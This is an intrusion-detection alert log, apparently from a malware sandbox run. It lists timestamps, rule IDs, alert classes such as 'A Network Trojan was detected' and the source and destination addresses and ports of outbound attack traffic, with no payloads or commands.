                            2024-12-11T00:44:02.555408+010020270631Attempted Administrator Privilege Gain192.168.2.235194479.149.151.1880TCP
                            2024-12-11T00:44:02.586539+010020270631Attempted Administrator Privilege Gain192.168.2.235691458.68.44.8780TCP
                            2024-12-11T00:44:03.461743+010020270631Attempted Administrator Privilege Gain192.168.2.2350626105.87.20.198080TCP
                            2024-12-11T00:44:03.494144+010020270631Attempted Administrator Privilege Gain192.168.2.2360082139.233.195.2198080TCP
                            2024-12-11T00:44:04.495157+010020270631Attempted Administrator Privilege Gain192.168.2.2343248190.58.45.8780TCP
                            2024-12-11T00:44:04.495266+010020270631Attempted Administrator Privilege Gain192.168.2.2336422165.102.249.298080TCP
                            2024-12-11T00:44:04.495386+010020270631Attempted Administrator Privilege Gain192.168.2.234863082.201.90.5880TCP
                            2024-12-11T00:44:04.509409+010020270631Attempted Administrator Privilege Gain192.168.2.234652265.103.37.428080TCP
                            2024-12-11T00:44:04.586667+010020270631Attempted Administrator Privilege Gain192.168.2.233637642.123.190.338080TCP
                            2024-12-11T00:44:05.430862+010020270631Attempted Administrator Privilege Gain192.168.2.235571832.154.86.12980TCP
                            2024-12-11T00:44:05.461732+010020270631Attempted Administrator Privilege Gain192.168.2.233862236.252.136.22480TCP
                            2024-12-11T00:44:06.414747+010020270631Attempted Administrator Privilege Gain192.168.2.23505744.3.110.08080TCP
                            2024-12-11T00:44:06.508637+010020270631Attempted Administrator Privilege Gain192.168.2.233711282.181.66.380TCP
                            2024-12-11T00:44:06.508764+010020270631Attempted Administrator Privilege Gain192.168.2.2360564211.23.135.1208080TCP
                            2024-12-11T00:44:07.461725+010020270631Attempted Administrator Privilege Gain192.168.2.235741616.56.252.1378080TCP
                            2024-12-11T00:44:07.524641+010020270631Attempted Administrator Privilege Gain192.168.2.2342166204.128.136.1388080TCP
                            2024-12-11T00:44:07.524965+010020270631Attempted Administrator Privilege Gain192.168.2.2349556219.249.5.1128080TCP
                            2024-12-11T00:44:08.461655+010020270631Attempted Administrator Privilege Gain192.168.2.233858818.56.150.5580TCP
                            2024-12-11T00:44:08.462365+010020270631Attempted Administrator Privilege Gain192.168.2.235969872.133.204.1508080TCP
                            2024-12-11T00:44:08.524349+010020270631Attempted Administrator Privilege Gain192.168.2.2357556112.110.69.178080TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-11T00:43:07.285697+010020273391A Network Trojan was detected192.168.2.235897279.39.229.2552869TCP
                            2024-12-11T00:43:07.286052+010020273391A Network Trojan was detected192.168.2.235928431.20.181.4852869TCP
                            2024-12-11T00:43:07.287143+010020273391A Network Trojan was detected192.168.2.2345240161.199.124.14552869TCP
                            2024-12-11T00:43:07.324653+010020273391A Network Trojan was detected192.168.2.234825851.217.212.9152869TCP
                            2024-12-11T00:43:07.326866+010020273391A Network Trojan was detected192.168.2.233903261.2.36.4852869TCP
                            2024-12-11T00:43:07.327251+010020273391A Network Trojan was detected192.168.2.2357932101.125.216.15152869TCP
                            2024-12-11T00:43:07.330571+010020273391A Network Trojan was detected192.168.2.2351804193.245.80.6852869TCP
                            2024-12-11T00:43:07.333510+010020273391A Network Trojan was detected192.168.2.235106673.124.161.5552869TCP
                            2024-12-11T00:43:07.333900+010020273391A Network Trojan was detected192.168.2.2354874217.238.86.7352869TCP
                            2024-12-11T00:43:07.334256+010020273391A Network Trojan was detected192.168.2.2344164131.95.252.21852869TCP
                            2024-12-11T00:43:07.345708+010020273391A Network Trojan was detected192.168.2.2335372170.59.144.17952869TCP
                            2024-12-11T00:43:07.349014+010020273391A Network Trojan was detected192.168.2.2342974179.30.194.10852869TCP
                            2024-12-11T00:43:07.363320+010020273391A Network Trojan was detected192.168.2.233762274.94.9.12652869TCP
                            2024-12-11T00:43:07.364039+010020273391A Network Trojan was detected192.168.2.233682279.79.71.15252869TCP
                            2024-12-11T00:43:07.370581+010020273391A Network Trojan was detected192.168.2.2344416113.8.22.9752869TCP
                            2024-12-11T00:43:07.371300+010020273391A Network Trojan was detected192.168.2.235422642.186.151.8452869TCP
                            2024-12-11T00:43:07.373112+010020273391A Network Trojan was detected192.168.2.236074636.77.84.3352869TCP
                            2024-12-11T00:43:07.382187+010020273391A Network Trojan was detected192.168.2.234290684.2.80.5752869TCP
                            2024-12-11T00:43:07.383635+010020273391A Network Trojan was detected192.168.2.2347372162.33.207.20552869TCP
                            2024-12-11T00:43:07.384360+010020273391A Network Trojan was detected192.168.2.2356902194.213.146.3952869TCP
                            2024-12-11T00:43:09.665707+010020273391A Network Trojan was detected192.168.2.236089245.153.216.852869TCP
                            2024-12-11T00:43:18.289920+010020273391A Network Trojan was detected192.168.2.233564259.92.247.20652869TCP
                            2024-12-11T00:43:18.298793+010020273391A Network Trojan was detected192.168.2.234221253.169.246.14852869TCP
                            2024-12-11T00:43:18.306159+010020273391A Network Trojan was detected192.168.2.2333420209.95.98.552869TCP
                            2024-12-11T00:43:18.306529+010020273391A Network Trojan was detected192.168.2.23454301.146.114.3452869TCP
                            2024-12-11T00:43:18.306899+010020273391A Network Trojan was detected192.168.2.2347912107.123.240.552869TCP
                            2024-12-11T00:43:18.309860+010020273391A Network Trojan was detected192.168.2.2359620104.228.111.1452869TCP
                            2024-12-11T00:43:18.310225+010020273391A Network Trojan was detected192.168.2.2350832113.213.180.15352869TCP
                            2024-12-11T00:43:18.332323+010020273391A Network Trojan was detected192.168.2.235301647.219.98.22052869TCP
                            2024-12-11T00:43:18.333808+010020273391A Network Trojan was detected192.168.2.234707030.145.58.1552869TCP
                            2024-12-11T00:43:18.334525+010020273391A Network Trojan was detected192.168.2.2346460131.244.225.10252869TCP
                            2024-12-11T00:43:18.349400+010020273391A Network Trojan was detected192.168.2.2359994165.209.139.4052869TCP
                            2024-12-11T00:43:18.350884+010020273391A Network Trojan was detected192.168.2.2358554160.49.80.17952869TCP
                            2024-12-11T00:43:18.354976+010020273391A Network Trojan was detected192.168.2.233867219.99.0.7552869TCP
                            2024-12-11T00:43:18.358655+010020273391A Network Trojan was detected192.168.2.235206879.28.180.5952869TCP
                            2024-12-11T00:43:18.368358+010020273391A Network Trojan was detected192.168.2.2349140182.225.227.23252869TCP
                            2024-12-11T00:43:18.369482+010020273391A Network Trojan was detected192.168.2.2334124214.179.110.3652869TCP
                            2024-12-11T00:43:18.370217+010020273391A Network Trojan was detected192.168.2.2333794145.241.115.12752869TCP
                            2024-12-11T00:43:18.376173+010020273391A Network Trojan was detected192.168.2.235387089.35.238.3952869TCP
                            2024-12-11T00:43:18.376494+010020273391A Network Trojan was detected192.168.2.233824091.150.21.15152869TCP
                            2024-12-11T00:43:18.384228+010020273391A Network Trojan was detected192.168.2.2355292188.206.66.252869TCP
                            2024-12-11T00:43:18.389083+010020273391A Network Trojan was detected192.168.2.2334030153.223.215.10752869TCP
                            2024-12-11T00:43:18.389823+010020273391A Network Trojan was detected192.168.2.234035024.139.219.7352869TCP
                            2024-12-11T00:43:22.483857+010020273391A Network Trojan was detected192.168.2.2348338112.83.214.9352869TCP
                            2024-12-11T00:43:30.304589+010020273391A Network Trojan was detected192.168.2.2351602157.105.171.22552869TCP
                            2024-12-11T00:43:30.342773+010020273391A Network Trojan was detected192.168.2.233408880.34.249.13452869TCP
                            2024-12-11T00:43:32.329721+010020273391A Network Trojan was detected192.168.2.2355802148.77.189.21452869TCP
                            2024-12-11T00:43:32.368626+010020273391A Network Trojan was detected192.168.2.2354904182.58.157.7852869TCP
                            2024-12-11T00:43:37.289817+010020273391A Network Trojan was detected192.168.2.235399055.235.209.20652869TCP
                            2024-12-11T00:43:37.317804+010020273391A Network Trojan was detected192.168.2.23484426.128.71.14152869TCP
                            2024-12-11T00:43:39.342382+010020273391A Network Trojan was detected192.168.2.2334580147.254.211.16552869TCP
                            2024-12-11T00:43:41.332544+010020273391A Network Trojan was detected192.168.2.2339918210.65.241.9652869TCP
                            2024-12-11T00:43:41.344148+010020273391A Network Trojan was detected192.168.2.2349020188.31.96.5052869TCP
                            2024-12-11T00:43:42.366092+010020273391A Network Trojan was detected192.168.2.233501621.54.197.19952869TCP
                            2024-12-11T00:43:43.341451+010020273391A Network Trojan was detected192.168.2.2350440219.164.39.6752869TCP
                            2024-12-11T00:43:49.900076+010020273391A Network Trojan was detected192.168.2.2358746200.129.247.23352869TCP
                            2024-12-11T00:43:50.317648+010020273391A Network Trojan was detected192.168.2.234989441.133.186.11752869TCP
                            2024-12-11T00:43:51.333222+010020273391A Network Trojan was detected192.168.2.234263050.103.241.25152869TCP
                            2024-12-11T00:43:51.347768+010020273391A Network Trojan was detected192.168.2.236040665.95.37.10652869TCP
                            2024-12-11T00:43:51.369560+010020273391A Network Trojan was detected192.168.2.2332896211.188.253.14452869TCP
                            2024-12-11T00:43:51.783919+010020273391A Network Trojan was detected192.168.2.235491618.171.155.3052869TCP
                            2024-12-11T00:43:52.341924+010020273391A Network Trojan was detected192.168.2.2349486208.115.154.7052869TCP
                            2024-12-11T00:43:52.380923+010020273391A Network Trojan was detected192.168.2.2351024125.170.236.15952869TCP
                            2024-12-11T00:43:53.309526+010020273391A Network Trojan was detected192.168.2.2348686144.7.7.9952869TCP
                            2024-12-11T00:43:53.336855+010020273391A Network Trojan was detected192.168.2.235303679.217.50.16452869TCP
                            2024-12-11T00:43:54.369830+010020273391A Network Trojan was detected192.168.2.233456629.79.215.23852869TCP
                            2024-12-11T00:43:55.355534+010020273391A Network Trojan was detected192.168.2.233720012.231.157.19052869TCP
                            2024-12-11T00:43:57.298573+010020273391A Network Trojan was detected192.168.2.235485232.132.72.9552869TCP
                            2024-12-11T00:43:57.301842+010020273391A Network Trojan was detected192.168.2.2336782219.13.140.6652869TCP
                            2024-12-11T00:43:59.292134+010020273391A Network Trojan was detected192.168.2.235910299.22.126.25152869TCP
                            2024-12-11T00:44:00.279723+010020273391A Network Trojan was detected192.168.2.2355994181.86.102.3252869TCP
                            2024-12-11T00:44:00.359465+010020273391A Network Trojan was detected192.168.2.2345632103.118.131.13952869TCP
                            2024-12-11T00:44:00.371848+010020273391A Network Trojan was detected192.168.2.235385479.67.65.18752869TCP
                            2024-12-11T00:44:01.320367+010020273391A Network Trojan was detected192.168.2.2354070104.46.236.10252869TCP
                            2024-12-11T00:44:01.346655+010020273391A Network Trojan was detected192.168.2.23475762.29.108.18352869TCP
                            2024-12-11T00:44:01.385532+010020273391A Network Trojan was detected192.168.2.2353672101.39.189.12452869TCP
                            2024-12-11T00:44:02.318108+010020273391A Network Trojan was detected192.168.2.23506886.8.177.5852869TCP
                            2024-12-11T00:44:03.330161+010020273391A Network Trojan was detected192.168.2.235132686.62.248.7952869TCP
                            2024-12-11T00:44:03.343037+010020273391A Network Trojan was detected192.168.2.235624262.49.22.18552869TCP
                            2024-12-11T00:44:04.392541+010020273391A Network Trojan was detected192.168.2.233867025.66.57.12352869TCP
                            2024-12-11T00:44:05.329462+010020273391A Network Trojan was detected192.168.2.2334000222.224.154.20952869TCP
                            2024-12-11T00:44:05.371894+010020273391A Network Trojan was detected192.168.2.2356932191.1.14.23352869TCP
                            2024-12-11T00:44:07.315675+010020273391A Network Trojan was detected192.168.2.2337590112.185.254.10152869TCP
                            2024-12-11T00:44:07.321167+010020273391A Network Trojan was detected192.168.2.23478663.202.203.4452869TCP
                            2024-12-11T00:44:07.326315+010020273391A Network Trojan was detected192.168.2.2336518149.162.57.9952869TCP
                            2024-12-11T00:44:09.073445+010020273391A Network Trojan was detected192.168.2.235657814.60.181.1452869TCP
                            2024-12-11T00:44:09.341698+010020273391A Network Trojan was detected192.168.2.2351946150.142.67.13052869TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-11T00:43:07.296583+010020300921Web Application Attack192.168.2.2334024193.94.36.4380TCP
                            2024-12-11T00:43:07.303115+010020300921Web Application Attack192.168.2.2355738154.140.14.680TCP
                            2024-12-11T00:43:07.303529+010020300921Web Application Attack192.168.2.2354192186.173.246.16480TCP
                            2024-12-11T00:43:07.305659+010020300921Web Application Attack192.168.2.233406616.29.234.24480TCP
                            2024-12-11T00:43:07.322448+010020300921Web Application Attack192.168.2.234761038.95.163.20580TCP
                            2024-12-11T00:43:07.329096+010020300921Web Application Attack192.168.2.235565654.252.138.17280TCP
                            2024-12-11T00:43:07.338331+010020300921Web Application Attack192.168.2.2356796121.202.179.680TCP
                            2024-12-11T00:43:07.354186+010020300921Web Application Attack192.168.2.2335922194.17.56.14680TCP
                            2024-12-11T00:43:07.357127+010020300921Web Application Attack192.168.2.2350674150.55.156.7980TCP
                            2024-12-11T00:43:07.361137+010020300921Web Application Attack192.168.2.23358523.179.237.11780TCP
                            2024-12-11T00:43:07.366583+010020300921Web Application Attack192.168.2.2358264131.241.38.20580TCP
                            2024-12-11T00:43:07.366941+010020300921Web Application Attack192.168.2.2351382113.213.140.11080TCP
                            2024-12-11T00:43:07.369486+010020300921Web Application Attack192.168.2.2337202216.199.223.13980TCP
                            2024-12-11T00:43:07.374990+010020300921Web Application Attack192.168.2.234520062.103.171.2880TCP
                            2024-12-11T00:43:07.375297+010020300921Web Application Attack192.168.2.235311228.102.126.4980TCP
                            2024-12-11T00:43:07.387992+010020300921Web Application Attack192.168.2.2350042137.151.78.14380TCP
                            2024-12-11T00:43:10.797458+010020300921Web Application Attack192.168.2.2344828102.75.189.13480TCP
                            2024-12-11T00:43:17.321348+010020300921Web Application Attack192.168.2.2348140158.155.184.15380TCP
                            2024-12-11T00:43:18.283960+010020300921Web Application Attack192.168.2.2354490172.27.14.5380TCP
                            2024-12-11T00:43:18.284369+010020300921Web Application Attack192.168.2.233933037.106.97.8680TCP
                            2024-12-11T00:43:18.286582+010020300921Web Application Attack192.168.2.233448481.152.153.10480TCP
                            2024-12-11T00:43:18.289188+010020300921Web Application Attack192.168.2.233351864.246.130.6580TCP
                            2024-12-11T00:43:18.291392+010020300921Web Application Attack192.168.2.2348354162.154.175.13880TCP
                            2024-12-11T00:43:18.304699+010020300921Web Application Attack192.168.2.2356244125.138.41.16480TCP
                            2024-12-11T00:43:18.308383+010020300921Web Application Attack192.168.2.2356222154.183.15.24080TCP
                            2024-12-11T00:43:18.309123+010020300921Web Application Attack192.168.2.235318638.61.43.5980TCP
                            2024-12-11T00:43:18.316441+010020300921Web Application Attack192.168.2.2332868217.149.6.5980TCP
                            2024-12-11T00:43:18.323073+010020300921Web Application Attack192.168.2.235286029.92.227.3080TCP
                            2024-12-11T00:43:18.326759+010020300921Web Application Attack192.168.2.2336152175.33.232.25180TCP
                            2024-12-11T00:43:18.331587+010020300921Web Application Attack192.168.2.2359644131.224.165.20180TCP
                            2024-12-11T00:43:18.331970+010020300921Web Application Attack192.168.2.2357702207.208.138.2580TCP
                            2024-12-11T00:43:18.336394+010020300921Web Application Attack192.168.2.234161243.51.149.14280TCP
                            2024-12-11T00:43:18.340889+010020300921Web Application Attack192.168.2.234380048.37.127.24280TCP
                            2024-12-11T00:43:18.341633+010020300921Web Application Attack192.168.2.235449884.44.230.19380TCP
                            2024-12-11T00:43:18.356443+010020300921Web Application Attack192.168.2.2333468168.11.66.4980TCP
                            2024-12-11T00:43:18.364642+010020300921Web Application Attack192.168.2.2342104195.103.106.24680TCP
                            2024-12-11T00:43:18.365746+010020300921Web Application Attack192.168.2.235262617.113.247.16980TCP
                            2024-12-11T00:43:18.367631+010020300921Web Application Attack192.168.2.2359804121.37.63.17580TCP
                            2024-12-11T00:43:18.370955+010020300921Web Application Attack192.168.2.2342268161.243.235.24080TCP
                            2024-12-11T00:43:18.385747+010020300921Web Application Attack192.168.2.233699627.220.140.15880TCP
                            2024-12-11T00:43:30.352588+010020300921Web Application Attack192.168.2.235646618.90.81.3180TCP
                            2024-12-11T00:43:32.287246+010020300921Web Application Attack192.168.2.2349854134.249.173.6880TCP
                            2024-12-11T00:43:32.338505+010020300921Web Application Attack192.168.2.2349252113.108.229.9380TCP
                            2024-12-11T00:43:32.339280+010020300921Web Application Attack192.168.2.2356578183.204.170.5780TCP
                            2024-12-11T00:43:32.351012+010020300921Web Application Attack192.168.2.233357049.66.23.14480TCP
                            2024-12-11T00:43:32.363542+010020300921Web Application Attack192.168.2.2334420156.188.135.4680TCP
                            2024-12-11T00:43:36.283420+010020300921Web Application Attack192.168.2.234142276.225.145.13280TCP
                            2024-12-11T00:43:36.283702+010020300921Web Application Attack192.168.2.2341852173.143.115.2780TCP
                            2024-12-11T00:43:36.285542+010020300921Web Application Attack192.168.2.2340520147.230.138.10580TCP
                            2024-12-11T00:43:36.286284+010020300921Web Application Attack192.168.2.233796666.158.237.4780TCP
                            2024-12-11T00:43:36.316600+010020300921Web Application Attack192.168.2.2338192209.97.96.8780TCP
                            2024-12-11T00:43:37.374549+010020300921Web Application Attack192.168.2.2353286196.101.145.1980TCP
                            2024-12-11T00:43:40.336299+010020300921Web Application Attack192.168.2.233277271.6.68.1680TCP
                            2024-12-11T00:43:42.280808+010020300921Web Application Attack192.168.2.2336894166.67.117.18980TCP
                            2024-12-11T00:43:42.301856+010020300921Web Application Attack192.168.2.234577662.197.147.8580TCP
                            2024-12-11T00:43:43.289507+010020300921Web Application Attack192.168.2.23588965.112.156.3280TCP
                            2024-12-11T00:43:44.373305+010020300921Web Application Attack192.168.2.2344768196.77.36.23680TCP
                            2024-12-11T00:43:45.304338+010020300921Web Application Attack192.168.2.235397075.42.18.21680TCP
                            2024-12-11T00:43:47.375262+010020300921Web Application Attack192.168.2.2359172204.28.245.6080TCP
                            2024-12-11T00:43:49.329339+010020300921Web Application Attack192.168.2.2360386166.190.152.4280TCP
                            2024-12-11T00:43:50.307025+010020300921Web Application Attack192.168.2.2336082186.43.106.24080TCP
                            2024-12-11T00:43:50.359743+010020300921Web Application Attack192.168.2.2356938125.216.231.23980TCP
                            2024-12-11T00:43:51.300046+010020300921Web Application Attack192.168.2.2345108114.23.158.9580TCP
                            2024-12-11T00:43:51.343264+010020300921Web Application Attack192.168.2.2335688130.4.44.24980TCP
                            2024-12-11T00:43:54.281882+010020300921Web Application Attack192.168.2.2343954153.243.22.4680TCP
                            2024-12-11T00:43:54.334735+010020300921Web Application Attack192.168.2.2352664205.160.164.4180TCP
                            2024-12-11T00:43:55.304956+010020300921Web Application Attack192.168.2.2359112102.56.202.22580TCP
                            2024-12-11T00:43:55.366780+010020300921Web Application Attack192.168.2.2340940191.76.14.22380TCP
                            2024-12-11T00:43:57.383225+010020300921Web Application Attack192.168.2.2356660182.41.168.580TCP
                            2024-12-11T00:43:58.319565+010020300921Web Application Attack192.168.2.2341090213.120.222.21980TCP
                            2024-12-11T00:44:00.332326+010020300921Web Application Attack192.168.2.2345806142.5.217.8180TCP
                            2024-12-11T00:44:02.369171+010020300921Web Application Attack192.168.2.235318096.190.191.6880TCP
                            2024-12-11T00:44:03.286655+010020300921Web Application Attack192.168.2.2356438159.166.66.22680TCP
                            2024-12-11T00:44:03.323178+010020300921Web Application Attack192.168.2.235456032.113.47.18280TCP
                            2024-12-11T00:44:04.346775+010020300921Web Application Attack192.168.2.233714889.176.240.19080TCP
                            2024-12-11T00:44:07.321904+010020300921Web Application Attack192.168.2.23596984.88.106.19580TCP
                            2024-12-11T00:44:07.335898+010020300921Web Application Attack192.168.2.2345338159.41.41.5980TCP
                            2024-12-11T00:44:07.372219+010020300921Web Application Attack192.168.2.2355786109.9.205.12380TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2024-12-11T00:42:58.247209+010020290341Web Application Attack192.168.2.2350400216.18.254.1618080TCP
                            2024-12-11T00:42:58.479152+010020290341Web Application Attack192.168.2.235894087.120.225.1175555TCP
                            2024-12-11T00:42:58.759121+010020290341Web Application Attack192.168.2.2350214125.133.16.2749152TCP
                            2024-12-11T00:43:00.962824+010020290341Web Application Attack192.168.2.2353258163.152.100.2580TCP
                            2024-12-11T00:43:06.285504+010020290341Web Application Attack192.168.2.234627076.227.143.21549152TCP
                            2024-12-11T00:43:06.286241+010020290341Web Application Attack192.168.2.235168254.78.250.895555TCP
                            2024-12-11T00:43:06.286607+010020290341Web Application Attack192.168.2.2359228123.175.241.12549152TCP
                            2024-12-11T00:43:06.321711+010020290341Web Application Attack192.168.2.234664034.136.79.417574TCP
                            2024-12-11T00:43:06.322839+010020290341Web Application Attack192.168.2.2341912152.158.234.1980TCP
                            2024-12-11T00:43:07.245978+010020290341Web Application Attack192.168.2.2340994134.220.93.1115555TCP
                            2024-12-11T00:43:07.285314+010020290341Web Application Attack192.168.2.234215471.44.225.11280TCP
                            2024-12-11T00:43:07.286788+010020290341Web Application Attack192.168.2.233387048.214.85.135555TCP
                            2024-12-11T00:43:07.287875+010020290341Web Application Attack192.168.2.235488023.173.106.2780TCP
                            2024-12-11T00:43:07.288595+010020290341Web Application Attack192.168.2.2354774204.81.207.1888080TCP
                            2024-12-11T00:43:07.289690+010020290341Web Application Attack192.168.2.2338010221.42.76.517574TCP
                            2024-12-11T00:43:07.290045+010020290341Web Application Attack192.168.2.234401279.10.209.3449152TCP
                            2024-12-11T00:43:07.290406+010020290341Web Application Attack192.168.2.23552649.58.179.10980TCP
                            2024-12-11T00:43:07.291131+010020290341Web Application Attack192.168.2.2346432203.29.198.2087574TCP
                            2024-12-11T00:43:07.292231+010020290341Web Application Attack192.168.2.2351378113.145.142.2028080TCP
                            2024-12-11T00:43:07.293673+010020290341Web Application Attack192.168.2.2360422184.96.7.288080TCP
                            2024-12-11T00:43:07.294045+010020290341Web Application Attack192.168.2.23406309.109.75.1278080TCP
                            2024-12-11T00:43:07.294448+010020290341Web Application Attack192.168.2.2347894206.142.193.1527574TCP
                            2024-12-11T00:43:07.294765+010020290341Web Application Attack192.168.2.235642447.30.123.2128080TCP
                            2024-12-11T00:43:07.295525+010020290341Web Application Attack192.168.2.2344964153.95.193.1215555TCP
                            2024-12-11T00:43:07.295856+010020290341Web Application Attack192.168.2.233863256.53.8.680TCP
                            2024-12-11T00:43:07.296583+010020290341Web Application Attack192.168.2.2334024193.94.36.4380TCP
                            2024-12-11T00:43:07.297669+010020290341Web Application Attack192.168.2.234821893.31.4.22549152TCP
                            2024-12-11T00:43:07.298038+010020290341Web Application Attack192.168.2.2343226206.130.7.228080TCP
                            2024-12-11T00:43:07.298436+010020290341Web Application Attack192.168.2.2339352222.38.112.22880TCP
                            2024-12-11T00:43:07.299493+010020290341Web Application Attack192.168.2.2354806143.186.21.17380TCP
                            2024-12-11T00:43:07.300575+010020290341Web Application Attack192.168.2.2348516186.251.44.2095555TCP
                            2024-12-11T00:43:07.300939+010020290341Web Application Attack192.168.2.2342356166.192.145.3949152TCP
                            2024-12-11T00:43:07.302758+010020290341Web Application Attack192.168.2.2353384162.198.43.2278080TCP
                            2024-12-11T00:43:07.303115+010020290341Web Application Attack192.168.2.2355738154.140.14.680TCP
                            2024-12-11T00:43:07.303529+010020290341Web Application Attack192.168.2.2354192186.173.246.16480TCP
                            2024-12-11T00:43:07.304934+010020290341Web Application Attack192.168.2.2352520140.9.134.1335555TCP
                            2024-12-11T00:43:07.305302+010020290341Web Application Attack192.168.2.234867640.223.116.25480TCP
                            2024-12-11T00:43:07.305659+010020290341Web Application Attack192.168.2.233406616.29.234.24480TCP
                            2024-12-11T00:43:07.306027+010020290341Web Application Attack192.168.2.2354080110.142.198.15849152TCP
                            2024-12-11T00:43:07.308211+010020290341Web Application Attack192.168.2.234540450.91.199.949152TCP
                            2024-12-11T00:43:07.308601+010020290341Web Application Attack192.168.2.2341280215.50.246.238080TCP
                            2024-12-11T00:43:07.309654+010020290341Web Application Attack192.168.2.234297490.197.2.275555TCP
                            2024-12-11T00:43:07.310378+010020290341Web Application Attack192.168.2.23462529.70.45.22749152TCP
                            2024-12-11T00:43:07.310747+010020290341Web Application Attack192.168.2.2343262113.146.56.7949152TCP
                            2024-12-11T00:43:07.311111+010020290341Web Application Attack192.168.2.2342856108.85.179.16049152TCP
                            2024-12-11T00:43:07.312203+010020290341Web Application Attack192.168.2.233731447.69.248.1249152TCP
                            2024-12-11T00:43:07.313335+010020290341Web Application Attack192.168.2.2358324201.200.12.1167574TCP
                            2024-12-11T00:43:07.314019+010020290341Web Application Attack192.168.2.235772865.131.166.13049152TCP
                            2024-12-11T00:43:07.314382+010020290341Web Application Attack192.168.2.235012632.170.33.25349152TCP
                            2024-12-11T00:43:07.314743+010020290341Web Application Attack192.168.2.235225845.27.188.997574TCP
                            2024-12-11T00:43:07.316938+010020290341Web Application Attack192.168.2.2352166157.149.9.225555TCP
                            2024-12-11T00:43:07.317309+010020290341Web Application Attack192.168.2.234613476.51.22.345555TCP
                            2024-12-11T00:43:07.318398+010020290341Web Application Attack192.168.2.2333290214.156.186.645555TCP
                            2024-12-11T00:43:07.318776+010020290341Web Application Attack192.168.2.2337392207.198.77.4580TCP
                            2024-12-11T00:43:07.319547+010020290341Web Application Attack192.168.2.234765630.227.89.815555TCP
                            2024-12-11T00:43:07.320238+010020290341Web Application Attack192.168.2.23450003.254.159.1817574TCP
                            2024-12-11T00:43:07.321717+010020290341Web Application Attack192.168.2.2359380212.148.153.19280TCP
                            2024-12-11T00:43:07.322123+010020290341Web Application Attack192.168.2.2350500215.47.78.2267574TCP
                            2024-12-11T00:43:07.322448+010020290341Web Application Attack192.168.2.234761038.95.163.20580TCP
                            2024-12-11T00:43:07.323554+010020290341Web Application Attack192.168.2.235657865.143.55.17549152TCP
                            2024-12-11T00:43:07.323911+010020290341Web Application Attack192.168.2.2334192121.19.25.7649152TCP
                            2024-12-11T00:43:07.325757+010020290341Web Application Attack192.168.2.2337292149.210.29.20180TCP
                            2024-12-11T00:43:07.327609+010020290341Web Application Attack192.168.2.2358674163.115.127.19180TCP
                            2024-12-11T00:43:07.328376+010020290341Web Application Attack192.168.2.2354190131.214.104.2157574TCP
                            2024-12-11T00:43:07.329096+010020290341Web Application Attack192.168.2.235565654.252.138.17280TCP
                            2024-12-11T00:43:07.332831+010020290341Web Application Attack192.168.2.2351422177.60.56.1105555TCP
                            2024-12-11T00:43:07.333175+010020290341Web Application Attack192.168.2.233652291.41.16.1188080TCP
                            2024-12-11T00:43:07.334630+010020290341Web Application Attack192.168.2.2338868141.202.115.1627574TCP
                            2024-12-11T00:43:07.335741+010020290341Web Application Attack192.168.2.2339344205.19.156.15480TCP
                            2024-12-11T00:43:07.336104+010020290341Web Application Attack192.168.2.2340430214.6.88.20049152TCP
                            2024-12-11T00:43:07.336474+010020290341Web Application Attack192.168.2.2346876190.202.109.2417574TCP
                            2024-12-11T00:43:07.336842+010020290341Web Application Attack192.168.2.2341916126.179.23.11180TCP
                            2024-12-11T00:43:07.337570+010020290341Web Application Attack192.168.2.235906667.156.164.3880TCP
                            2024-12-11T00:43:07.338331+010020290341Web Application Attack192.168.2.2356796121.202.179.680TCP
                            2024-12-11T00:43:07.339072+010020290341Web Application Attack192.168.2.2339970217.176.190.10949152TCP
                            2024-12-11T00:43:07.339437+010020290341Web Application Attack192.168.2.233795690.24.179.1638080TCP
                            2024-12-11T00:43:07.340177+010020290341Web Application Attack192.168.2.233352681.109.6.2005555TCP
                            2024-12-11T00:43:07.346799+010020290341Web Application Attack192.168.2.2344166166.117.94.497574TCP
                            2024-12-11T00:43:07.347181+010020290341Web Application Attack192.168.2.234246682.213.155.868080TCP
                            2024-12-11T00:43:07.347915+010020290341Web Application Attack192.168.2.234212092.244.233.2068080TCP
                            2024-12-11T00:43:07.348277+010020290341Web Application Attack192.168.2.2338328187.114.160.1627574TCP
                            2024-12-11T00:43:07.350127+010020290341Web Application Attack192.168.2.2333314153.28.27.688080TCP
                            2024-12-11T00:43:07.351238+010020290341Web Application Attack192.168.2.235974056.225.44.2208080TCP
                            2024-12-11T00:43:07.351608+010020290341Web Application Attack192.168.2.236070296.114.30.20780TCP
                            2024-12-11T00:43:07.351988+010020290341Web Application Attack192.168.2.23493164.134.245.14849152TCP
                            2024-12-11T00:43:07.352359+010020290341Web Application Attack192.168.2.234972673.24.73.2327574TCP
                            2024-12-11T00:43:07.352709+010020290341Web Application Attack192.168.2.2355636117.31.40.2085555TCP
                            2024-12-11T00:43:07.354186+010020290341Web Application Attack192.168.2.2335922194.17.56.14680TCP
                            2024-12-11T00:43:07.354557+010020290341Web Application Attack192.168.2.2340054161.199.60.2035555TCP
                            2024-12-11T00:43:07.356033+010020290341Web Application Attack192.168.2.2340896186.182.149.1107574TCP
                            2024-12-11T00:43:07.356397+010020290341Web Application Attack192.168.2.233328643.107.215.19949152TCP
                            2024-12-11T00:43:07.357127+010020290341Web Application Attack192.168.2.2350674150.55.156.7980TCP
                            2024-12-11T00:43:07.358580+010020290341Web Application Attack192.168.2.2359632196.150.108.1225555TCP
                            2024-12-11T00:43:07.359679+010020290341Web Application Attack192.168.2.234453439.106.254.707574TCP
                            2024-12-11T00:43:07.360400+010020290341Web Application Attack192.168.2.2355572210.164.84.18549152TCP
                            2024-12-11T00:43:07.361137+010020290341Web Application Attack192.168.2.23358523.179.237.11780TCP
                            2024-12-11T00:43:07.361858+010020290341Web Application Attack192.168.2.2346306167.83.233.3549152TCP
                            2024-12-11T00:43:07.362610+010020290341Web Application Attack192.168.2.234671412.69.195.2267574TCP
                            2024-12-11T00:43:07.363679+010020290341Web Application Attack192.168.2.23524108.202.67.2298080TCP
                            2024-12-11T00:43:07.364409+010020290341Web Application Attack192.168.2.234525045.22.47.1038080TCP
                            2024-12-11T00:43:07.365131+010020290341Web Application Attack192.168.2.2353022117.238.33.988080TCP
                            2024-12-11T00:43:07.365502+010020290341Web Application Attack192.168.2.234780215.233.37.15049152TCP
                            2024-12-11T00:43:07.366583+010020290341Web Application Attack192.168.2.2358264131.241.38.20580TCP
